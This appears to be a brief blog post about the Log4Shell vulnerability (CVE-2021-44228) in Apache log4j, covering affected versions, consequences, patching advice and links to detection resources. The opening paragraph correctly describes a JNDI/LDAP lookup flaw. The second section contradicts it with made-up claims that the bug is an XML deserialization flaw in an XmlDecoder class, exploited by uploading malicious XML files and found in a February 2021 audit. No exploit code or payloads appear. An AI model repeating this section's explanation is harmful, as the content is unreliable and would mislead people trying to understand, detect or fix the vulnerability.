CVE-2021-44228: An Apache log4j flaw could enable remote attackers to take over systems
A new Apache log4j flaw has been discovered that could enable remote attackers to take over systems. CVE-2021-44228 is a log4j remote code execution (RCE) bug. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. This flaw is particularly dangerous as it can be easily exploited and could lead to a wide-scale breach.
What is CVE-2021-44228?
CVE-2021-44228, also referred to as the Log4J XML Deserialization Flaw, is a vulnerability found in Apache log4j, a popular logging framework for Java applications. The vulnerability was identified during a security audit in February 2021. The flaw is caused by an insecure deserialization issue in the XmlDecoder class, which is used to unmarshal XML files. This could allow an attacker to upload a malicious XML file containing malicious code, which would then be executed on the server.The vulnerability is rated as high severity by CVSS, and could lead to the server being taken over and all data on it being compromised. It is important for developers to apply the latest security patch from Apache to ensure their servers are secure.
What are the consequences of CVE-2021-44228?
The consequences of CVE-2021-44228 can be devastating if left unaddressed. An attacker can gain control and upload malicious executable code on exposed machines. A successful attack could lead to loss of sensitive data, such as personal information, usernames, passwords, or credit card numbers, or worse. Additionally, the attacker could execute malicious code on the server and create backdoors to gain further persistence to the compromised system. Organizations that do not patch the vulnerability may also suffer financial losses and further reputational damage, as the compromised data can be exfiltrated and sold or used for identity theft. The best way to protect against CVE-2021-44228 is to patch the affected applications as soon as possible. Additionally, organizations can use web application firewalls or other security tools to protect from malicious traffic and create detections and alerting to observe exploit attempts. It is also important to regularly check for any other vulnerabilities and make sure the external network is secure.
More info and current versions:
Sample strings and attacks for detection:
- https://log4shell.huntress.com
- https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java
Thanks for the information!